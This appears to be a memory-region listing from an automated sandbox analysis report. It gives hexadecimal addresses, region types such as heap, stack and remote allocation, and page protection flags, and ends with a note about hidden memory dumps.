64C0000
trusted library section
page read and write
41DA000
trusted library allocation
page read and write
96D000
heap
page read and write
8A0000
unclassified section
page execute and read and write
4360000
trusted library allocation
page read and write
1A0000
unkown
page readonly
10C000
stack
page read and write
22B000
trusted library allocation
page execute and read and write
21A0000
heap
page read and write
61B0000
heap
page read and write
6B15000
heap
page read and write
44FB000
stack
page read and write
2E0000
trusted library allocation
page read and write
3B98000
stack
page read and write
2BA0000
unkown
page read and write
1B83000
heap
page read and write
3410000
trusted library allocation
page read and write
300000
unkown
page read and write
64A0000
heap
page read and write
3DB1000
unkown
page read and write
6007000
system
page execute and read and write
6E00000
heap
page read and write
7850000
unkown
page read and write
1B65000
heap
page read and write
572000
heap
page read and write
9C0000
trusted library allocation
page read and write
258E000
stack
page read and write
23B0000
unkown
page read and write
3C10000
unkown
page read and write
2420000
trusted library allocation
page read and write
2134000
heap
page read and write
2A84000
heap
page read and write
6619000
heap
page read and write
340000
heap
page read and write
4F0000
heap
page read and write
6699000
stack
page read and write
E3F000
stack
page read and write
1B30000
unkown
page readonly
51E6000
heap
page read and write
6785000
heap
page read and write
260000
trusted library allocation
page read and write
383000
heap
page read and write
6B9D000
heap
page read and write
298000
heap
page read and write
50CD000
stack
page read and write
28E000
heap
page read and write
5D50000
unkown
page read and write
260E000
unkown
page read and write
2472000
heap
page read and write
2D70000
unkown
page read and write
4F8000
heap
page read and write
210000
trusted library allocation
page read and write
1F68000
trusted library allocation
page read and write
ACEE000
stack
page read and write
10000
heap
page read and write
720000
trusted library allocation
page read and write
28E000
heap
page read and write
786E000
unkown
page read and write
63B0000
heap
page read and write
3C00000
unkown
page read and write
6120000
heap
page read and write
64D0000
heap
page read and write
676B000
stack
page read and write
25E0000
unkown
page read and write
49CD000
stack
page read and write
3C60000
unkown
page readonly
760000
heap
page read and write
6F72000
heap
page read and write
23DB000
unkown
page read and write
290000
trusted library allocation
page read and write
2607000
unkown
page read and write
2443000
heap
page read and write
706A000
unkown
page read and write
37F000
stack
page read and write
43D0000
trusted library allocation
page read and write
6B5C000
heap
page read and write
2D90000
heap
page read and write
7089000
unkown
page read and write
6724000
heap
page read and write
360000
trusted library allocation
page read and write
200E000
stack
page read and write
38F000
heap
page read and write
2A8B000
heap
page read and write
4380000
heap
page read and write
8F0000
trusted library allocation
page read and write
B60000
direct allocation
page execute and read and write
1D10000
unkown
page readonly
3750000
unkown
page readonly
780000
trusted library allocation
page read and write
36D000
trusted library allocation
page execute and read and write
6BD5000
heap
page read and write
33C000
unkown
page read and write
1D6000
heap
page read and write
649A000
heap
page read and write
43D0000
trusted library allocation
page read and write
6B99000
heap
page read and write
5E3E000
stack
page read and write
489F000
stack
page read and write
2CF0000
heap
page read and write
51D2000
heap
page read and write
4F4D000
stack
page read and write
7850000
unkown
page read and write
3B98000
stack
page read and write
2431000
trusted library allocation
page read and write
6536000
heap
page read and write
415E000
stack
page read and write
4B6000
heap
page read and write
4DCD000
heap
page read and write
1CD2000
unkown
page read and write
33FE000
stack
page read and write
2AF1000
unkown
page read and write
2430000
direct allocation
page execute and read and write
8F0000
heap
page read and write
1C4000
heap
page read and write
1CB000
stack
page read and write
6320000
heap
page read and write
2F4000
heap
page read and write
383000
heap
page read and write
2D3E000
stack
page read and write
6BEB000
heap
page read and write
2B0000
heap
page read and write
580000
unkown
page readonly
6AA4000
heap
page read and write
5D58000
unkown
page read and write
8454000
unkown
page read and write
69F1000
heap
page read and write
25E0000
unkown
page read and write
1FAE000
stack
page read and write | page guard
D70000
trusted library allocation
page execute and read and write
3B90000
stack
page read and write
490000
trusted library allocation
page read and write
28E000
stack
page read and write
4040000
unkown
page readonly
5DA000
heap
page read and write
6312000
heap
page read and write
240A000
heap
page read and write
402000
remote allocation
page execute and read and write
43D0000
trusted library allocation
page read and write
676E000
heap
page read and write
3C0000
trusted library allocation
page read and write
6B28000
heap
page read and write
6BA5000
heap
page read and write
2614000
trusted library allocation
page read and write
3EE0000
unkown
page read and write
377000
heap
page read and write
AC0000
direct allocation
page execute and read and write
1B0000
trusted library allocation
page read and write
5A6000
heap
page read and write
2281000
trusted library allocation
page read and write
505E000
stack
page read and write
2437000
heap
page read and write
363F000
heap
page read and write
29D5000
trusted library allocation
page read and write
244F000
heap
page read and write
1F1E000
stack
page read and write
6B58000
heap
page read and write
166000
stack
page read and write
3F05000
unkown
page read and write
3C50000
unkown
page readonly
738C000
heap
page read and write
4CE000
stack
page read and write
497000
heap
page read and write
983000
heap
page read and write
518C000
heap
page read and write
69BB000
stack
page read and write
65EF000
heap
page read and write
38A0000
unkown
page read and write
1BE000
heap
page read and write
4B5000
heap
page read and write
3410000
trusted library allocation
page read and write
1D20000
unkown
page readonly
2450000
heap
page read and write
3C20000
unkown
page read and write
6BF6000
heap
page read and write
760000
heap
page read and write
378000
heap
page read and write
156000
heap
page read and write
5E48000
heap
page read and write
3EE0000
unkown
page read and write
3C00000
unkown
page read and write
66F7000
heap
page read and write
2586000
trusted library allocation
page read and write
1B30000
unkown
page readonly
279F000
trusted library allocation
page read and write
3C20000
unkown
page read and write
36F000
stack
page read and write
69BB000
stack
page read and write
380000
trusted library allocation
page read and write
626E000
heap
page read and write
230000
heap
page read and write
493C000
heap
page read and write
2130000
heap
page read and write
3BF0000
unkown
page read and write
3740000
unkown
page readonly
1B7000
heap
page read and write
967000
heap
page read and write
4D3E000
stack
page read and write
2EB0000
heap
page read and write
7A90000
unkown
page read and write
3A60000
unkown
page readonly
97F000
heap
page read and write
4B3E000
stack
page read and write
68E8000
heap
page read and write
2B00000
unkown
page readonly
5DA000
heap
page read and write
43D0000
trusted library allocation
page read and write
55F000
heap
page read and write
7FC0000
heap
page read and write
212000
trusted library allocation
page read and write
6BAD000
heap
page read and write
43D0000
trusted library allocation
page read and write
1FBD000
heap
page read and write
3281000
trusted library allocation
page read and write
69B9000
heap
page read and write
340000
heap
page read and write
400000
remote allocation
page execute and read and write
44EE000
stack
page read and write
30C4000
trusted library allocation
page read and write
130000
trusted library allocation
page read and write
4360000
trusted library allocation
page read and write
280000
heap
page read and write
7000000
heap
page read and write
246D000
heap
page read and write
12D000
trusted library allocation
page execute and read and write
364F000
heap
page read and write
77DA000
heap
page read and write
290000
heap
page read and write
5AC000
heap
page read and write
240B000
heap
page read and write
8454000
unkown
page read and write
43F0000
heap
page execute and read and write
330000
unkown
page readonly
786E000
unkown
page read and write
605E000
stack
page read and write
3760000
unkown
page read and write
6622000
heap
page read and write
170000
stack
page read and write
570000
heap
page read and write
2F0C000
heap
page read and write
77DA000
heap
page read and write
3B0000
trusted library allocation
page read and write
5DD0000
heap
page read and write
327000
trusted library allocation
page execute and read and write
2B9E000
stack
page read and write
C57000
direct allocation
page execute and read and write
293000
trusted library allocation
page read and write
5DA000
heap
page read and write
32E9000
trusted library allocation
page read and write
253B000
trusted library allocation
page read and write
49A0000
trusted library section
page read and write
3654000
heap
page read and write
458E000
stack
page read and write
5240000
heap
page read and write
511E000
stack
page read and write
435C000
stack
page read and write
24A1000
unkown
page read and write
5D72000
heap
page read and write
1E3F000
stack
page read and write
48BF000
stack
page read and write
6589000
unkown
page read and write
1B3000
trusted library allocation
page execute and read and write
22C7000
direct allocation
page execute and read and write
669B000
stack
page read and write
3A80000
unkown
page execute and read and write
4B5000
heap
page read and write
490000
heap
page read and write
5B0000
heap
page read and write
C30000
trusted library allocation
page read and write
6733000
heap
page read and write
3880000
unkown
page read and write
649C000
heap
page read and write
839B000
unkown
page read and write
1BE0000
unkown
page readonly
3A0000
trusted library allocation
page read and write
52CD000
stack
page read and write
83A9000
unkown
page read and write
2177000
stack
page read and write
2E3000
trusted library allocation
page read and write
46DE000
stack
page read and write
634E000
heap
page read and write
22C0000
direct allocation
page execute and read and write
910000
trusted library allocation
page read and write
C7E000
stack
page read and write
43D0000
trusted library allocation
page read and write
152000
trusted library allocation
page read and write
297000
trusted library allocation
page read and write
295E000
stack
page read and write
5E07000
stack
page read and write
38B0000
unkown
page read and write
7166000
unkown
page read and write
6FF0000
heap
page read and write
265A000
heap
page read and write
43EC000
stack
page read and write
2CB0000
unkown
page readonly
10000
heap
page read and write
23D0000
unkown
page read and write
23E0000
heap
page read and write
764000
heap
page read and write
3AA1000
unkown
page read and write
97F000
heap
page read and write
453A000
stack
page read and write
155000
trusted library allocation
page execute and read and write
5ECE000
stack
page read and write
1D10000
unkown
page readonly
6760000
stack
page read and write
439E000
stack
page read and write
246A000
heap
page read and write
65C9000
heap
page read and write
6B63000
heap
page read and write
70A1000
unkown
page read and write
5B1000
heap
page read and write
1A0000
trusted library allocation
page read and write
3CB0000
unkown
page read and write
466E000
stack
page read and write
6AD7000
heap
page read and write
5D8000
heap
page read and write
21AE000
stack
page read and write
773C000
stack
page read and write
5B0000
heap
page read and write
22FC000
trusted library allocation
page read and write
245A000
heap
page read and write
6728000
heap
page read and write
3ECA000
unkown
page read and write
692C000
heap
page read and write
70AD000
unkown
page read and write
260E000
unkown
page read and write
37C000
heap
page read and write
705E000
stack
page read and write
AE2E000
stack
page read and write | page guard
7530000
heap
page read and write
31E000
unkown
page read and write
2BD0000
unkown
page read and write
672C000
heap
page read and write
C10000
trusted library allocation
page read and write
580000
unkown
page readonly
1B0000
trusted library allocation
page read and write
95A000
heap
page read and write
3C90000
unkown
page readonly
3F0000
heap
page read and write
1D30000
unkown
page readonly
7649000
heap
page read and write
6880000
heap
page read and write
5E8E000
stack
page read and write
48E000
stack
page read and write
6700000
heap
page read and write
2350000
direct allocation
page execute and read and write
605E000
stack
page read and write
150000
heap
page read and write
65BF000
heap
page read and write
6972000
heap
page read and write
4CEE000
stack
page read and write
2131000
heap
page read and write
3C60000
unkown
page readonly
2E2000
heap
page read and write
5D54000
heap
page read and write
250000
trusted library allocation
page execute and read and write
23CB000
unkown
page read and write
23FE000
heap
page read and write
299000
trusted library allocation
page read and write
27C5000
trusted library allocation
page read and write
2D95000
heap
page read and write
26B000
heap
page read and write
6745000
heap
page read and write
4C6E000
stack
page read and write | page guard
3CE0000
heap
page read and write
41F000
remote allocation
page execute and read and write
123000
trusted library allocation
page execute and read and write
2800000
unkown
page execute and read and write
64A2000
heap
page read and write
1B40000
unkown
page read and write
6B90000
heap
page read and write
64F0000
heap
page read and write
1DFD000
heap
page read and write
1C3000
trusted library allocation
page execute and read and write
520000
trusted library allocation
page read and write
640000
heap
page read and write
3CC0000
unkown
page read and write
7740000
heap
page read and write
3A90000
heap
page read and write
25DB000
heap
page read and write
6B34000
heap
page read and write
4FD0000
heap
page read and write
5B7000
heap
page read and write
23AC000
stack
page read and write
641E000
heap
page read and write
270000
heap
page read and write
30C1000
trusted library allocation
page read and write
23E0000
unkown
page readonly
766C000
heap
page read and write
40DC000
stack
page read and write
8F7000
heap
page read and write
2B0000
unkown
page read and write
27BF000
stack
page read and write
7553000
heap
page read and write
6792000
heap
page read and write
43F6000
heap
page execute and read and write
1D0000
trusted library allocation
page read and write
6B9A000
heap
page read and write
4DAE000
stack
page read and write
150000
trusted library allocation
page read and write
279D000
trusted library allocation
page read and write
1DA000
trusted library allocation
page execute and read and write
5FA000
unclassified section
page execute and read and write
2ACA000
stack
page read and write
401E000
stack
page read and write
65C5000
heap
page read and write
1B0000
trusted library allocation
page read and write
8510000
unkown
page read and write
4740000
unkown
page read and write
4B5E000
stack
page read and write
23EF000
stack
page read and write
2407000
unkown
page read and write
6123000
system
page execute and read and write
41FC000
stack
page read and write
513D000
heap
page read and write
596000
heap
page read and write
4F50000
heap
page read and write
690000
trusted library allocation
page read and write
1BE000
heap
page read and write
3780000
unkown
page read and write
3C30000
unkown
page read and write
5D0E000
stack
page read and write
4D6000
heap
page read and write
23DB000
unkown
page read and write
9B4000
heap
page read and write
9A0000
trusted library allocation
page read and write
3D0000
heap
page read and write
217000
trusted library allocation
page execute and read and write
20C1000
trusted library allocation
page read and write
682E000
heap
page read and write
1B0000
trusted library allocation
page read and write
2B00000
unkown
page readonly
1B0000
trusted library allocation
page read and write
34AE000
stack
page read and write
2AE0000
unkown
page read and write
2C4000
heap
page read and write
4D5D000
stack
page read and write
705E000
stack
page read and write
411D000
stack
page read and write
6772000
heap
page read and write
B40000
direct allocation
page execute and read and write
674C000
heap
page read and write
1E0E000
stack
page read and write
3890000
unkown
page read and write
2968000
stack
page read and write
6474000
heap
page read and write
43D0000
trusted library allocation
page read and write
66B0000
heap
page read and write
3945000
stack
page read and write
968000
heap
page read and write
2CB0000
unkown
page readonly
7089000
unkown
page read and write
6AD3000
heap
page read and write
6A0000
heap
page execute and read and write
106000
heap
page read and write
2366000
trusted library allocation
page read and write
541000
heap
page read and write
284F000
stack
page read and write
3B0000
trusted library allocation
page read and write
4C4F000
stack
page read and write
3ED4000
unkown
page read and write
DBE000
stack
page read and write
80BE000
stack
page read and write
2A80000
heap
page read and write
1CD000
trusted library allocation
page execute and read and write
70AD000
unkown
page read and write
6F98000
heap
page read and write
64D7000
heap
page read and write
37DA000
trusted library allocation
page read and write
64B1000
heap
page read and write
324E000
stack
page read and write
3FF000
stack
page read and write
5D58000
unkown
page read and write
676B000
stack
page read and write
3780000
unkown
page read and write
250000
trusted library allocation
page execute and read and write
7166000
unkown
page read and write
3E98000
unkown
page read and write
6362000
heap
page read and write
83A9000
unkown
page read and write
519E000
stack
page read and write
9BD000
heap
page read and write
7D0000
trusted library allocation
page execute and read and write
270000
trusted library allocation
page read and write
5ED9000
stack
page read and write
6B7E000
stack
page read and write
400000
remote allocation
page execute and read and write
6E00000
heap
page read and write
62F0000
heap
page read and write
590000
unclassified section
page execute and read and write
5B0000
heap
page read and write
35F9000
trusted library allocation
page read and write
490000
heap
page read and write
613E000
stack
page read and write
D0000
trusted library allocation
page read and write
3870000
unkown
page read and write
370000
heap
page read and write
25E6000
trusted library allocation
page read and write
3D00000
unkown
page readonly
69F0000
heap
page read and write
1CD2000
unkown
page read and write
213F000
stack
page read and write
1F00000
heap
page read and write
64CA000
heap
page read and write
645D000
heap
page read and write
CC0000
trusted library allocation
page read and write
3491000
trusted library allocation
page read and write
38A000
heap
page read and write
8353000
unkown
page read and write
1D0000
trusted library allocation
page read and write
490000
heap
page read and write
75E000
stack
page read and write
65CC000
heap
page read and write
1CB0000
heap
page read and write
83D0000
unkown
page read and write
657D000
stack
page read and write
27C7000
trusted library allocation
page read and write
C51000
direct allocation
page execute and read and write
4200000
unkown
page read and write
1CD000
trusted library allocation
page execute and read and write
23B0000
trusted library allocation
page read and write
957000
heap
page read and write
6B60000
heap
page read and write
1C4000
trusted library allocation
page read and write
2D9E000
heap
page read and write
65B4000
heap
page read and write
8553000
unkown
page read and write
967000
heap
page read and write
44EF000
stack
page read and write
30EE000
stack
page read and write
2F0000
heap
page read and write
D9F000
stack
page read and write
512F000
heap
page read and write
3870000
unkown
page read and write
6392000
heap
page read and write
6207000
heap
page read and write
7650000
heap
page read and write
2434000
heap
page read and write
2430000
unkown
page read and write
E50000
trusted library allocation
page read and write
43A2000
heap
page read and write
6910000
heap
page read and write
37D000
heap
page read and write
24D000
stack
page read and write
6530000
heap
page read and write
There are 1351 hidden memdumps, click here to show them.